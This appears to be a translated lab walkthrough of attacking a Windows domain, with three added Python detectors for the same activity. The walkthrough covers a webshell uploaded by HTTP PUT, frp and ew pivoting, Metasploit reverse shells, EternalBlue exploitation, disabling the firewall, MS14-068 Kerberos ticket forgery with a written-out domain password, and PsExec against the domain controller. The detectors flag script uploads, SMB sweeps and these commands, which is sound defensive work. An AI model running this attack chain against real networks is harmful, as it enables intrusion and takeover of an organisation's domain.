Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-9fcd3600f51a2c2e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3a674b35f179b062.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-253a8264bf2646d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-86b984dff5deba4d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 2001
![](https://upload-images.jianshu.io/upload_images/4664072-31d649f0590e3bbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3dbc0a32964cdc6e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ea4dbbe4a4488d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-899644627ea4e9c5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 2002
![](https://upload-images.jianshu.io/upload_images/4664072-e4f0cfeff9808f29.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Capture the request, change it to a PUT request, and upload the webshell (add a / in front).
![](https://upload-images.jianshu.io/upload_images/4664072-165ab40f95f004fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-60dca0d8dddbab9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-398cf80d345ad3c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
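The PUT upload above is the kind of write request a web server should never accept for script files. The following added example (not code from the original post) scans constructed Combined Log Format access-log lines and flags PUT/MOVE/COPY requests whose target is a server-side script, normalizing suffix tricks such as a trailing slash or encoded space before checking the extension; the log lines, hosts and paths are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); not from the original page.
SAMPLE_LOG = """\
192.168.1.128 - - [10/Jun/2020:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.128 - - [10/Jun/2020:10:01:05 +0800] "PUT /shell.jsp/ HTTP/1.1" 201 0 "-" "Mozilla/5.0"
192.168.1.128 - - [10/Jun/2020:10:01:07 +0800] "PUT /upload/report.txt HTTP/1.1" 201 0 "-" "curl/7.68"
192.168.1.128 - - [10/Jun/2020:10:01:09 +0800] "GET /shell.jsp?cmd=whoami HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jun/2020:10:02:00 +0800] "PUT /x.jspx%20 HTTP/1.1" 204 0 "-" "python-requests/2.23"
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
WRITE_METHODS = {"PUT", "MOVE", "COPY"}
SCRIPT_EXT = (".jsp", ".jspx", ".php", ".asp", ".aspx", ".war")

def normalize_target(path):
    """Decode the request path and strip suffixes used to slip past extension checks:
    a trailing "/" or trailing whitespace/NUL appended after the real extension."""
    decoded = unquote(path.split("?", 1)[0])
    return decoded.rstrip("/ \t\x00").lower()

def flag_script_uploads(log_text):
    """Return (src, method, raw path, status) for write requests that would create
    a server-side script file; 2xx status means the server accepted the write."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # line does not match the expected log format
        if m["method"] not in WRITE_METHODS:
            continue
        if normalize_target(m["path"]).endswith(SCRIPT_EXT):
            hits.append((m["src"], m["method"], m["path"], int(m["status"])))
    return hits
```

A successful hit (status 201/204) followed by GET requests to the same path with query parameters, as in the sample, is the pattern to alert on; the hardening is to disallow write methods on the web application entirely.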
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-a6aa2a93e9195230.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d7414eda1225c489.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Adding a proxy
Reset for personal reasons:
Kali IP address changed to 192.168.1.128
CentOS IP address is 192.168.1.130
Modify the client configuration
![](https://upload-images.jianshu.io/upload_images/4664072-fe16fd4416ad5dc7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Server side
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
./frpc -c ./frpc.ini
./frps -c ./frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-c535b8a1ea1cbb8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dd24f206f25b86fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or use an ew proxy
chmod 777 ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080
proxychains proxy
vi /etc/proxychains.conf
![](https://upload-images.jianshu.io/upload_images/4664072-36483afbc7c4b767.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4440
run
route add 192.168.183.0 255.255.255.0 2
route print
![](https://upload-images.jianshu.io/upload_images/4664072-c46a8693a37377b7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Host discovery
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.1/24
set threads 10
run
![](https://upload-images.jianshu.io/upload_images/4664072-d839cf906de7d80f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.183.128-132
rhosts => 192.168.183.128-132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-89882c50218177e5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
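The smb_version and smb_ms17_010 scans above touch every host in the 192.168.183.0/24 range on TCP/445 within seconds, which is what a network sensor sees from the pivot host. The following added example (not code from the original post) detects that sweep pattern over constructed connection records of the form "timestamp src dst dport"; the addresses and timestamps are constructed samples, and the threshold and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def build_sample_conns():
    """Constructed connection records "timestamp src dst dport" (not from the page):
    one source touching 12 hosts on 445 within 3 seconds, plus a client that opens
    two file shares an hour apart (normal activity)."""
    lines = [f"2020-06-10T10:05:{i // 4:02d} 192.168.183.128 192.168.183.{i + 1} 445"
             for i in range(12)]
    lines.append("2020-06-10T10:00:00 192.168.183.50 192.168.183.10 445")
    lines.append("2020-06-10T11:00:00 192.168.183.50 192.168.183.11 445")
    return "\n".join(lines)

def detect_smb_sweeps(conn_text, threshold=10, window=timedelta(seconds=60)):
    """Return (src, distinct_targets, first_ts, last_ts) for each source that reached
    at least `threshold` distinct hosts on TCP/445 inside any `window`-long interval."""
    by_src = defaultdict(list)
    for line in conn_text.splitlines():
        ts, src, dst, dport = line.split()
        if dport == "445":
            by_src[src].append((datetime.fromisoformat(ts), dst))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window forward until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= threshold:
                alerts.append((src, len(targets), events[start][0], events[end][0]))
                break  # one alert per source is enough
    return alerts
```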
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-5d09bd5ab495dd9f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
set payload windows/x64/shell/bind_tcp
![](https://upload-images.jianshu.io/upload_images/4664072-2088aa8529f67628.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-16c75f8c95e498e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Only a plain shell was obtained.
Code page 65001 (UTF-8) fixes the garbled output:
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-97ba9a4d8e24e81c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
netsh firewall set opmode disable (turns off the firewall)
![](https://upload-images.jianshu.io/upload_images/4664072-6bb40897bac3035c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ipconfig
![](https://upload-images.jianshu.io/upload_images/4664072-76a05d1d8a6b96fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
List machines in the domain
net view /domain:demo
![](https://upload-images.jianshu.io/upload_images/4664072-ad8af9a4b0bb38e5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-930ad154ed1ddde2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
View the desktop
![](https://upload-images.jianshu.io/upload_images/4664072-2c114c3a8ce0e04f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
![](https://upload-images.jianshu.io/upload_images/4664072-ab2246d1e1ce8b14.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
kerberos::purge
![](https://upload-images.jianshu.io/upload_images/4664072-23144ef8d0418ca3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
kerberos::list
kerberos::ptc TGT_douser@demo.com.ccache
![](https://upload-images.jianshu.io/upload_images/4664072-39019d44fa00e1e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Access files on the domain controller
dir \\WIN-ENS2VR5TR3N\c$
![](https://upload-images.jianshu.io/upload_images/4664072-f7801d13f6cc9d63.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Using PsExec.exe from the PSTools directory to get a shell failed
PsExec64.exe \\WIN-ENS2VR5TR3N cmd.exe
![](https://upload-images.jianshu.io/upload_images/4664072-fd83e751d2366dd9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
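The commands run from the shell above (chcp 65001, netsh firewall set opmode disable, net view /domain, and the PsExec attempt against the domain controller) each leave a process-creation record on the host. The following added example (not code from the original post) applies command-line detection rules to constructed Sysmon Event ID 1 style records and correlates them per user; the records, user names and rule thresholds are constructed assumptions.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, one per line; not from the original page.
SAMPLE_EVENTS = """\
Image=C:\\Windows\\System32\\chcp.com CommandLine="chcp 65001" User="DEMO\\douser"
Image=C:\\Windows\\System32\\netsh.exe CommandLine="netsh firewall set opmode disable" User="DEMO\\douser"
Image=C:\\Windows\\System32\\net.exe CommandLine="net view /domain:demo" User="DEMO\\douser"
Image=C:\\Windows\\System32\\svchost.exe CommandLine="svchost.exe -k netsvcs" User="NT AUTHORITY\\SYSTEM"
Image=C:\\Windows\\PSEXESVC.exe CommandLine="C:\\Windows\\PSEXESVC.exe" User="NT AUTHORITY\\SYSTEM"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# (rule name, severity, pattern applied to the process command line)
RULES = [
    ("firewall_disabled_via_netsh", "high",
     re.compile(r"netsh\s+(firewall\s+set\s+opmode\s+disable|advfirewall\s+set\s+\w+\s+state\s+off)", re.I)),
    ("psexec_service_binary", "high", re.compile(r"\\PSEXESVC\.exe", re.I)),
    ("domain_host_enumeration", "medium", re.compile(r"\bnet1?(\.exe)?\s+view\s+/domain", re.I)),
    ("console_codepage_switch", "low", re.compile(r"\bchcp\s+65001\b", re.I)),
]

def parse_event(line):
    """Turn one key=value record into a dict, stripping the quotes around quoted values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def match_rules(event):
    """Return the names of all rules whose pattern matches this event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, _sev, pat in RULES if pat.search(cmd)]

def detect(events_text):
    """Return (user, rule, command line) for every matching event, in log order."""
    alerts = []
    for line in events_text.splitlines():
        ev = parse_event(line)
        for rule in match_rules(ev):
            alerts.append((ev.get("User", "?"), rule, ev.get("CommandLine", "")))
    return alerts

def users_with_chain(events_text, min_rules=2):
    """Users that tripped at least `min_rules` distinct rules: the sequence on this
    page (chcp, firewall off, net view) all comes from one interactive shell."""
    seen = {}
    for user, rule, _cmd in detect(events_text):
        seen.setdefault(user, set()).add(rule)
    return sorted(u for u, rules in seen.items() if len(rules) >= min_rules)
```

The low-severity code-page switch is not worth an alert on its own; its value is as a correlation signal next to the firewall change and domain enumeration from the same account.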
Reference articles
https://www.cnblogs.com/yuzly/p/10859520.html
https://blog.51cto.com/loveemily/2163147
https://blog.csdn.net/deng_xj/article/details/88952420
https://www.cnblogs.com/PANDA-Mosen/p/13118210.html